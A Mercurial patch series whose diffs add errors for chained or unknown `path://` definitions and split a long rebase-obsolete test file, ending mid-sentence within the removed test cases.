Differential Revision: https://phab.mercurial-scm.org/D10264 diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -2317,6 +2317,8 @@ u.fragment = None self.url = u + # the url from the config/command line before dealing with `path://` + self.raw_url = u.copy() self.branch = branch self.name = name @@ -2338,6 +2340,10 @@ if self.url.scheme == b'path': assert self.url.path is None subpath = paths[self.url.host] + if subpath.raw_url.scheme == b'path': + m = _('cannot use `%s`, "%s" is also define as a `path://`') + m %= (self.rawloc, self.url.host) + raise error.Abort(m) self.url = subpath.url self.rawloc = subpath.rawloc self.loc = subpath.loc diff --git a/mercurial/util.py b/mercurial/util.py --- a/mercurial/util.py +++ b/mercurial/util.py @@ -3144,6 +3144,21 @@ if v is not None: setattr(self, a, urlreq.unquote(v)) + def copy(self): + u = url(b'temporary useless value') + u.path = self.path + u.scheme = self.scheme + u.user = self.user + u.passwd = self.passwd + u.host = self.host + u.path = self.path + u.query = self.query + u.fragment = self.fragment + u._localpath = self._localpath + u._hostport = self._hostport + u._origpath = self._origpath + return u + @encoding.strmethod def __repr__(self): attrs = [] diff --git a/tests/test-paths.t b/tests/test-paths.t --- a/tests/test-paths.t +++ b/tests/test-paths.t @@ -334,3 +334,39 @@ adding manifests adding file changes added 5 changesets with 0 changes to 0 files (+1 heads) + +Test chaining path:// definition +-------------------------------- + +This is currently unsupported, but feel free to implement the necessary +dependency detection. 
+ + $ cat << EOF >> .hg/hgrc + > chain_path=path://other_default + > EOF + + $ hg id + 000000000000 + $ hg path + abort: cannot use `path://other_default`, "other_default" is also define as a `path://` + [255] + $ hg pull chain_path + abort: cannot use `path://other_default`, "other_default" is also define as a `path://` + [255] + +Doing an actual circle should always be an issue + + $ cat << EOF >> .hg/hgrc + > rock=path://cissors + > cissors=path://paper + > paper=://rock + > EOF + + $ hg id + 000000000000 + $ hg path + abort: cannot use `path://other_default`, "other_default" is also define as a `path://` + [255] + $ hg pull chain_path + abort: cannot use `path://other_default`, "other_default" is also define as a `path://` + [255] # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1616540698 -3600 # Wed Mar 24 00:04:58 2021 +0100 # Node ID 395cf404e76a9aad0375d91959f63d6cd0427555 # Parent 1ecf082386b707d80d06caba6a9d3e75bdbe43b5 path: error out if the `path://` reference point to an unknown path Differential Revision: https://phab.mercurial-scm.org/D10265 diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -2339,7 +2339,12 @@ def chain_path(self, ui, paths): if self.url.scheme == b'path': assert self.url.path is None - subpath = paths[self.url.host] + try: + subpath = paths[self.url.host] + except KeyError: + m = _('cannot use `%s`, "%s" is not a known path') + m %= (self.rawloc, self.url.host) + raise error.Abort(m) if subpath.raw_url.scheme == b'path': m = _('cannot use `%s`, "%s" is also define as a `path://`') m %= (self.rawloc, self.url.host) diff --git a/tests/test-paths.t b/tests/test-paths.t --- a/tests/test-paths.t +++ b/tests/test-paths.t @@ -370,3 +370,18 @@ $ hg pull chain_path abort: cannot use `path://other_default`, "other_default" is also define as a `path://` [255] + +Test basic error cases +---------------------- + + $ cat << EOF > .hg/hgrc + > [paths] + > 
error-missing=path://unknown + > EOF + $ hg path + abort: cannot use `path://unknown`, "unknown" is not a known path + [255] + $ hg pull error-missing + abort: cannot use `path://unknown`, "unknown" is not a known path + [255] + # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616516009 25200 # Tue Mar 23 09:13:29 2021 -0700 # Node ID 13b200ffe8eb08ca6c3aa1e2076f0971fef30c12 # Parent 395cf404e76a9aad0375d91959f63d6cd0427555 tests: split up test-rebase-obsolete.t in four pieces The test case took 42 seconds to run the test before this patch and 12 seconds after (wall time, of course). Differential Revision: https://phab.mercurial-scm.org/D10255 diff --git a/tests/test-rebase-obsolete.t b/tests/test-rebase-obsolete.t --- a/tests/test-rebase-obsolete.t +++ b/tests/test-rebase-obsolete.t @@ -743,1396 +743,3 @@ 1 new orphan changesets $ cd .. - -Skip obsolete changeset even with multiple hops ------------------------------------------------ - -setup - - $ hg init obsskip - $ cd obsskip - $ cat << EOF >> .hg/hgrc - > [experimental] - > rebaseskipobsolete = True - > [extensions] - > strip = - > EOF - $ echo A > A - $ hg add A - $ hg commit -m A - $ echo B > B - $ hg add B - $ hg commit -m B0 - $ hg commit --amend -m B1 - $ hg commit --amend -m B2 - $ hg up --hidden 'desc(B0)' - 0 files updated, 0 files merged, 0 files removed, 0 files unresolved - updated to hidden changeset a8b11f55fb19 - (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290) - $ echo C > C - $ hg add C - $ hg commit -m C - 1 new orphan changesets - $ hg log -G - @ 4:212cb178bcbb C - | - | o 3:261e70097290 B2 - | | - x | 1:a8b11f55fb19 B0 (rewritten using amend as 3:261e70097290) - |/ - o 0:4a2df7238c3b A - - -Rebase finds its way in a chain of marker - - $ hg rebase -d 'desc(B2)' - note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 3:261e70097290 "B2" - rebasing 4:212cb178bcbb tip "C" - -Even when the chain include missing node - - $ hg up 
--hidden 'desc(B0)' - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset a8b11f55fb19 - (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290) - $ echo D > D - $ hg add D - $ hg commit -m D - 1 new orphan changesets - $ hg --hidden strip -r 'desc(B1)' - saved backup bundle to $TESTTMP/obsskip/.hg/strip-backup/86f6414ccda7-b1c452ee-backup.hg - 1 new orphan changesets - $ hg log -G - @ 5:1a79b7535141 D - | - | o 4:ff2c4d47b71d C - | | - | o 2:261e70097290 B2 - | | - x | 1:a8b11f55fb19 B0 (rewritten using amend as 2:261e70097290) - |/ - o 0:4a2df7238c3b A - - - $ hg rebase -d 'desc(B2)' - note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 2:261e70097290 "B2" - rebasing 5:1a79b7535141 tip "D" - $ hg up 4 - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "O" > O - $ hg add O - $ hg commit -m O - $ echo "P" > P - $ hg add P - $ hg commit -m P - $ hg log -G - @ 8:8d47583e023f P - | - o 7:360bbaa7d3ce O - | - | o 6:9c48361117de D - | | - o | 4:ff2c4d47b71d C - |/ - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg debugobsolete `hg log -r 7 -T '{node}\n'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - 1 new orphan changesets - $ hg rebase -d 6 -r "4::" - rebasing 4:ff2c4d47b71d "C" - note: not rebasing 7:360bbaa7d3ce "O", it has no successor - rebasing 8:8d47583e023f tip "P" - -If all the changeset to be rebased are obsolete and present in the destination, we -should display a friendly error message - - $ hg log -G - @ 10:121d9e3bc4c6 P - | - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - - $ hg up 9 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "non-relevant change" > nonrelevant - $ hg add nonrelevant - $ hg commit -m nonrelevant - created new head - $ hg debugobsolete `hg log -r 11 -T '{node}\n'` --config experimental.evolution=true - 1 
new obsolescence markers - obsoleted 1 changesets - $ hg log -G - @ 11:f44da1f4954c nonrelevant (pruned) - | - | o 10:121d9e3bc4c6 P - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg rebase -r . -d 10 - note: not rebasing 11:f44da1f4954c tip "nonrelevant", it has no successor - -If a rebase is going to create divergence, it should abort - - $ hg log -G - @ 10:121d9e3bc4c6 P - | - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - - $ hg up 9 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "john" > doe - $ hg add doe - $ hg commit -m "john doe" - created new head - $ hg up 10 - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "foo" > bar - $ hg add bar - $ hg commit --amend -m "10'" - $ hg up 10 --hidden - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset 121d9e3bc4c6 - (hidden revision '121d9e3bc4c6' was rewritten as: 77d874d096a2) - $ echo "bar" > foo - $ hg add foo - $ hg commit -m "bar foo" - 1 new orphan changesets - $ hg log -G - @ 14:73568ab6879d bar foo - | - | o 13:77d874d096a2 10' - | | - | | o 12:3eb461388009 john doe - | |/ - x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2) - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg summary - parent: 14:73568ab6879d tip (orphan) - bar foo - branch: default - commit: (clean) - update: 2 new changesets, 3 branch heads (merge) - phases: 8 draft - orphan: 1 changesets - $ hg rebase -s 10 -d 12 - abort: this rebase will cause divergences from: 121d9e3bc4c6 - (to force the rebase please set experimental.evolution.allowdivergence=True) - [20] - $ hg log -G - @ 14:73568ab6879d bar foo - | - | o 13:77d874d096a2 10' - | | - | | o 12:3eb461388009 john doe - | |/ - x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2) - |/ - 
o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - -With experimental.evolution.allowdivergence=True, rebase can create divergence - - $ hg rebase -s 10 -d 12 --config experimental.evolution.allowdivergence=True - rebasing 10:121d9e3bc4c6 "P" - rebasing 14:73568ab6879d tip "bar foo" - 2 new content-divergent changesets - $ hg summary - parent: 16:61bd55f69bc4 tip - bar foo - branch: default - commit: (clean) - update: 1 new changesets, 2 branch heads (merge) - phases: 8 draft - content-divergent: 2 changesets - -rebase --continue + skipped rev because their successors are in destination -we make a change in trunk and work on conflicting changes to make rebase abort. - - $ hg log -G -r 16:: - @ 16:61bd55f69bc4 bar foo - | - ~ - -Create the two changes in trunk - $ printf "a" > willconflict - $ hg add willconflict - $ hg commit -m "willconflict first version" - - $ printf "dummy" > C - $ hg commit -m "dummy change successor" - -Create the changes that we will rebase - $ hg update -C 16 -q - $ printf "b" > willconflict - $ hg add willconflict - $ hg commit -m "willconflict second version" - created new head - $ printf "dummy" > K - $ hg add K - $ hg commit -m "dummy change" - $ printf "dummy" > L - $ hg add L - $ hg commit -m "dummy change" - $ hg debugobsolete `hg log -r ".^" -T '{node}'` `hg log -r 18 -T '{node}'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - 1 new orphan changesets - - $ hg log -G -r 16:: - @ 21:7bdc8a87673d dummy change - | - x 20:8b31da3c4919 dummy change (rewritten as 18:601db7a18f51) - | - o 19:b82fb57ea638 willconflict second version - | - | o 18:601db7a18f51 dummy change successor - | | - | o 17:357ddf1602d5 willconflict first version - |/ - o 16:61bd55f69bc4 bar foo - | - ~ - $ hg rebase -r ".^^ + .^ + ." -d 18 - rebasing 19:b82fb57ea638 "willconflict second version" - merging willconflict - warning: conflicts while merging willconflict! 
(edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - - $ hg resolve --mark willconflict - (no more unresolved files) - continue: hg rebase --continue - $ hg rebase --continue - rebasing 19:b82fb57ea638 "willconflict second version" - note: not rebasing 20:8b31da3c4919 "dummy change", already in destination as 18:601db7a18f51 "dummy change successor" - rebasing 21:7bdc8a87673d tip "dummy change" - $ cd .. - -Divergence cases due to obsolete changesets -------------------------------------------- - -We should ignore branches with unstable changesets when they are based on an -obsolete changeset which successor is in rebase set. - - $ hg init divergence - $ cd divergence - $ cat >> .hg/hgrc << EOF - > [extensions] - > strip = - > [alias] - > strip = strip --no-backup --quiet - > [templates] - > instabilities = '{rev}:{node|short} {desc|firstline}{if(instabilities," ({instabilities})")}\n' - > EOF - - $ hg debugdrawdag <<EOF - > e f - > | | - > d' d # replace: d -> d' - > \ / - > c - > | - > x b - > \| - > a - > EOF - 1 new orphan changesets - $ hg log -G -r 'a':: - * 7:1143e9adc121 f - | - | o 6:d60ebfa0f1cb e - | | - | o 5:027ad6c5830d d' - | | - x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - -Changeset d and its descendants are excluded to avoid divergence of d, which -would occur because the successor of d (d') is also in rebaseset. As a -consequence f (descendant of d) is left behind. 
- - $ hg rebase -b 'e' -d 'x' - rebasing 1:488e1b7e7341 b "b" - rebasing 3:a82ac2b38757 c "c" - rebasing 5:027ad6c5830d d' "d'" - rebasing 6:d60ebfa0f1cb e "e" - note: not rebasing 4:76be324c128b d "d" and its descendants as this would cause divergence - $ hg log -G -r 'a':: - o 11:eb6d63fc4ed5 e - | - o 10:44d8c724a70c d' - | - o 9:d008e6b4d3fd c - | - o 8:67e8f4a16c49 b - | - | * 7:1143e9adc121 f - | | - | | x 6:d60ebfa0f1cb e (rewritten using rebase as 11:eb6d63fc4ed5) - | | | - | | x 5:027ad6c5830d d' (rewritten using rebase as 10:44d8c724a70c) - | | | - | x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - | |/ - | x 3:a82ac2b38757 c (rewritten using rebase as 9:d008e6b4d3fd) - | | - o | 2:630d7c95eff7 x - | | - | x 1:488e1b7e7341 b (rewritten using rebase as 8:67e8f4a16c49) - |/ - o 0:b173517d0057 a - - $ hg strip -r 8: - $ hg log -G -r 'a':: - * 7:1143e9adc121 f - | - | o 6:d60ebfa0f1cb e - | | - | o 5:027ad6c5830d d' - | | - x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - -If the rebase set has an obsolete (d) with a successor (d') outside the rebase -set and none in destination, we still get the divergence warning. -By allowing divergence, we can perform the rebase. 
- - $ hg rebase -r 'c'::'f' -d 'x' - abort: this rebase will cause divergences from: 76be324c128b - (to force the rebase please set experimental.evolution.allowdivergence=True) - [20] - $ hg rebase --config experimental.evolution.allowdivergence=true -r 'c'::'f' -d 'x' - rebasing 3:a82ac2b38757 c "c" - rebasing 4:76be324c128b d "d" - rebasing 7:1143e9adc121 f tip "f" - 1 new orphan changesets - 2 new content-divergent changesets - $ hg log -G -r 'a':: -T instabilities - o 10:e1744ea07510 f - | - * 9:e2b36ea9a0a0 d (content-divergent) - | - o 8:6a0376de376e c - | - | x 7:1143e9adc121 f - | | - | | * 6:d60ebfa0f1cb e (orphan) - | | | - | | * 5:027ad6c5830d d' (orphan content-divergent) - | | | - | x | 4:76be324c128b d - | |/ - | x 3:a82ac2b38757 c - | | - o | 2:630d7c95eff7 x - | | - | o 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ hg strip -r 8: - -(Not skipping obsoletes means that divergence is allowed.) - - $ hg rebase --config experimental.rebaseskipobsolete=false -r 'c'::'f' -d 'x' - rebasing 3:a82ac2b38757 c "c" - rebasing 4:76be324c128b d "d" - rebasing 7:1143e9adc121 f tip "f" - 1 new orphan changesets - 2 new content-divergent changesets - - $ hg strip -r 0: - -Similar test on a more complex graph - - $ hg debugdrawdag <<EOF - > g - > | - > f e - > | | - > e' d # replace: e -> e' - > \ / - > c - > | - > x b - > \| - > a - > EOF - 1 new orphan changesets - $ hg log -G -r 'a': - * 8:2876ce66c6eb g - | - | o 7:3ffec603ab53 f - | | - x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) - | | - | o 5:63324dc512ea e' - | | - o | 4:76be324c128b d - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ hg rebase -b 'f' -d 'x' - rebasing 1:488e1b7e7341 b "b" - rebasing 3:a82ac2b38757 c "c" - rebasing 5:63324dc512ea e' "e'" - rebasing 7:3ffec603ab53 f "f" - rebasing 4:76be324c128b d "d" - note: not rebasing 6:e36fae928aec e "e" and its descendants as this would cause divergence - $ hg log -G -r 
'a': - o 13:a1707a5b7c2c d - | - | o 12:ef6251596616 f - | | - | o 11:b6f172e64af9 e' - |/ - o 10:d008e6b4d3fd c - | - o 9:67e8f4a16c49 b - | - | * 8:2876ce66c6eb g - | | - | | x 7:3ffec603ab53 f (rewritten using rebase as 12:ef6251596616) - | | | - | x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) - | | | - | | x 5:63324dc512ea e' (rewritten using rebase as 11:b6f172e64af9) - | | | - | x | 4:76be324c128b d (rewritten using rebase as 13:a1707a5b7c2c) - | |/ - | x 3:a82ac2b38757 c (rewritten using rebase as 10:d008e6b4d3fd) - | | - o | 2:630d7c95eff7 x - | | - | x 1:488e1b7e7341 b (rewritten using rebase as 9:67e8f4a16c49) - |/ - o 0:b173517d0057 a - - -issue5782 - $ hg strip -r 0: - $ hg debugdrawdag <<EOF - > d - > | - > c1 c # replace: c -> c1 - > \ / - > b - > | - > a - > EOF - 1 new orphan changesets - $ hg debugobsolete `hg log -T "{node}" --hidden -r 'desc("c1")'` - 1 new obsolescence markers - obsoleted 1 changesets - $ hg log -G -r 'a': --hidden - * 4:76be324c128b d - | - | x 3:ef8a456de8fa c1 (pruned) - | | - x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa) - |/ - o 1:488e1b7e7341 b - | - o 0:b173517d0057 a - - $ hg rebase -d 0 -r 2 - note: not rebasing 2:a82ac2b38757 c "c", it has no successor - $ hg log -G -r 'a': --hidden - * 4:76be324c128b d - | - | x 3:ef8a456de8fa c1 (pruned) - | | - x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa) - |/ - o 1:488e1b7e7341 b - | - o 0:b173517d0057 a - - $ cd .. 
- -Rebase merge where successor of one parent is equal to destination (issue5198) - - $ hg init p1-succ-is-dest - $ cd p1-succ-is-dest - - $ hg debugdrawdag <<EOF - > F - > /| - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d B -s D - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 4:66f1a38021c9 F tip "F" - $ hg log -G - o 5:50e9d60b99c6 F - |\ - | | x 4:66f1a38021c9 F (rewritten using rebase as 5:50e9d60b99c6) - | |/| - | o | 3:7fb047a69f22 E - | | | - | | x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | |/ - o | 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is equal to destination - - $ hg init p2-succ-is-dest - $ cd p2-succ-is-dest - - $ hg debugdrawdag <<EOF - > F - > /| - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d B -s E - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 4:66f1a38021c9 F tip "F" - $ hg log -G - o 5:aae1787dacee F - |\ - | | x 4:66f1a38021c9 F (rewritten using rebase as 5:aae1787dacee) - | |/| - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - | o | 2:b18e25de2cf5 D - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. 
- -Rebase merge where successor of one parent is ancestor of destination - - $ hg init p1-succ-in-dest - $ cd p1-succ-in-dest - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -s D - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - - $ hg log -G - o 6:0913febf6439 F - |\ - +---x 5:66f1a38021c9 F (rewritten using rebase as 6:0913febf6439) - | | | - | o | 4:26805aba1e60 C - | | | - o | | 3:7fb047a69f22 E - | | | - +---x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | | - | o 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is ancestor of destination - - $ hg init p2-succ-in-dest - $ cd p2-succ-in-dest - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -s E - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - $ hg log -G - o 6:c6ab0cc6d220 F - |\ - +---x 5:66f1a38021c9 F (rewritten using rebase as 6:c6ab0cc6d220) - | | | - | o | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - o---+ 2:b18e25de2cf5 D - / / - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. 
- -Rebase merge where successor of one parent is ancestor of destination - - $ hg init p1-succ-in-dest-b - $ cd p1-succ-in-dest-b - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -b F - rebasing 2:b18e25de2cf5 D "D" - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes - $ hg log -G - o 6:8f47515dda15 D - | - | x 5:66f1a38021c9 F (pruned using rebase) - | |\ - o | | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - | x | 2:b18e25de2cf5 D (rewritten using rebase as 6:8f47515dda15) - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is ancestor of destination - - $ hg init p2-succ-in-dest-b - $ cd p2-succ-in-dest-b - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -b F - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 3:7fb047a69f22 E "E" - rebasing 5:66f1a38021c9 F tip "F" - note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes - - $ hg log -G - o 6:533690786a86 E - | - | x 5:66f1a38021c9 F (pruned using rebase) - | |\ - o | | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using rebase as 6:533690786a86) - | | | - | x | 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. 
- -Rebase merge where extinct node has successor that is not an ancestor of -destination - - $ hg init extinct-with-succ-not-in-dest - $ cd extinct-with-succ-not-in-dest - - $ hg debugdrawdag <<EOF - > E C # replace: C -> E - > | | - > D B - > |/ - > A - > EOF - - $ hg rebase -d D -s B - rebasing 1:112478962961 B "B" - note: not rebasing 3:26805aba1e60 C "C" and its descendants as this would cause divergence - - $ cd .. - - $ hg init p2-succ-in-dest-c - $ cd p2-succ-in-dest-c - -The scenario here was that B::D were developed on default. B was queued on -stable, but amended before being push to hg-committed. C was queued on default, -along with unrelated J. - - $ hg debugdrawdag <<EOF - > J - > | - > F - > | - > E - > | D - > | | - > | C # replace: C -> F - > | | H I # replace: B -> H -> I - > | B |/ - > |/ G - > A - > EOF - 1 new orphan changesets - -This strip seems to be the key to avoid an early divergence warning. - $ hg --config extensions.strip= --hidden strip -qr H - 1 new orphan changesets - - $ hg rebase -b 'desc("D")' -d 'desc("J")' - abort: this rebase will cause divergences from: 112478962961 - (to force the rebase please set experimental.evolution.allowdivergence=True) - [20] - -Rebase merge where both parents have successors in destination - - $ hg init p12-succ-in-dest - $ cd p12-succ-in-dest - $ hg debugdrawdag <<'EOS' - > E F - > /| /| # replace: A -> C - > A B C D # replace: B -> D - > | | - > X Y - > EOS - 1 new orphan changesets - $ hg rebase -r A+B+E -d F - note: not rebasing 4:a3d17304151f A "A", already in destination as 0:96cc3511f894 C "C" - note: not rebasing 5:b23a2cc00842 B "B", already in destination as 1:058c1e1fb10a D "D" - rebasing 7:dac5d11c5a7d E tip "E" - abort: rebasing 7:dac5d11c5a7d will include unwanted changes from 3:59c792af609c, 5:b23a2cc00842 or 2:ba2b7fa7166d, 4:a3d17304151f - [10] - $ cd .. - -Rebase a non-clean merge. One parent has successor in destination, the other -parent moves as requested. 
- - $ hg init p1-succ-p2-move - $ cd p1-succ-p2-move - $ hg debugdrawdag <<'EOS' - > D Z - > /| | # replace: A -> C - > A B C # D/D = D - > EOS - 1 new orphan changesets - $ hg rebase -r A+B+D -d Z - note: not rebasing 0:426bada5c675 A "A", already in destination as 2:96cc3511f894 C "C" - rebasing 1:fc2b737bb2e5 B "B" - rebasing 3:b8ed089c80ad D "D" - - $ rm .hg/localtags - $ hg log -G - o 6:e4f78693cc88 D - | - o 5:76840d832e98 B - | - o 4:50e41c1f3950 Z - | - o 2:96cc3511f894 C - - $ hg files -r tip - B - C - D - Z - - $ cd .. - - $ hg init p1-move-p2-succ - $ cd p1-move-p2-succ - $ hg debugdrawdag <<'EOS' - > D Z - > /| | # replace: B -> C - > A B C # D/D = D - > EOS - 1 new orphan changesets - $ hg rebase -r B+A+D -d Z - rebasing 0:426bada5c675 A "A" - note: not rebasing 1:fc2b737bb2e5 B "B", already in destination as 2:96cc3511f894 C "C" - rebasing 3:b8ed089c80ad D "D" - - $ rm .hg/localtags - $ hg log -G - o 6:1b355ed94d82 D - | - o 5:a81a74d764a6 A - | - o 4:50e41c1f3950 Z - | - o 2:96cc3511f894 C - - $ hg files -r tip - A - C - D - Z - - $ cd .. - -Test that bookmark is moved and working dir is updated when all changesets have -equivalents in destination - $ hg init rbsrepo && cd rbsrepo - $ echo "[experimental]" > .hg/hgrc - $ echo "evolution=true" >> .hg/hgrc - $ echo "rebaseskipobsolete=on" >> .hg/hgrc - $ echo root > root && hg ci -Am root - adding root - $ echo a > a && hg ci -Am a - adding a - $ hg up 0 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo b > b && hg ci -Am b - adding b - created new head - $ hg rebase -r 2 -d 1 - rebasing 2:1e9a3c00cbe9 tip "b" - $ hg log -r . # working dir is at rev 3 (successor of 2) - 3:be1832deae9a b (no-eol) - $ hg book -r 2 mybook --hidden # rev 2 has a bookmark on it now - bookmarking hidden changeset 1e9a3c00cbe9 - (hidden revision '1e9a3c00cbe9' was rewritten as: be1832deae9a) - $ hg up 2 && hg log -r . 
# working dir is at rev 2 again - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - 2:1e9a3c00cbe9 b (rewritten using rebase as 3:be1832deae9a) (no-eol) - $ hg rebase -r 2 -d 3 --config experimental.evolution.track-operation=1 - note: not rebasing 2:1e9a3c00cbe9 mybook "b", already in destination as 3:be1832deae9a tip "b" -Check that working directory and bookmark was updated to rev 3 although rev 2 -was skipped - $ hg log -r . - 3:be1832deae9a b (no-eol) - $ hg bookmarks - mybook 3:be1832deae9a - $ hg debugobsolete --rev tip - 1e9a3c00cbe90d236ac05ef61efcc5e40b7412bc be1832deae9ac531caa7438b8dcf6055a122cd8e 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - -Obsoleted working parent and bookmark could be moved if an ancestor of working -parent gets moved: - - $ hg init $TESTTMP/ancestor-wd-move - $ cd $TESTTMP/ancestor-wd-move - $ hg debugdrawdag <<'EOS' - > E D1 # rebase: D1 -> D2 - > | | - > | C - > D2 | - > | B - > |/ - > A - > EOS - $ hg update D1 -q - $ hg bookmark book -i - $ hg rebase -r B+D1 -d E - rebasing 1:112478962961 B "B" - note: not rebasing 5:15ecf15e0114 book D1 tip "D1", already in destination as 2:0807738e0be9 D2 "D2" - 1 new orphan changesets - $ hg log -G -T '{desc} {bookmarks}' - @ B book - | - | x D1 - | | - o | E - | | - | * C - | | - o | D2 - | | - | x B - |/ - o A - -Rebasing a merge with one of its parent having a hidden successor - - $ hg init $TESTTMP/merge-p1-hidden-successor - $ cd $TESTTMP/merge-p1-hidden-successor - - $ hg debugdrawdag <<'EOS' - > E - > | - > B3 B2 # amend: B1 -> B2 -> B3 - > |/ # B2 is hidden - > | D - > | |\ - > | B1 C - > |/ - > A - > EOS - 1 new orphan changesets - - $ eval `hg tags -T '{tag}={node}\n'` - $ rm .hg/localtags - - $ hg rebase -r $D -d $E - rebasing 5:9e62094e4d94 "D" - - $ hg log -G - o 7:a699d059adcf D - |\ - | o 6:ecc93090a95c E - | | - | o 4:0dc878468a23 B3 - | | - o | 1:96cc3511f894 C - / - o 0:426bada5c675 A - -For some reasons 
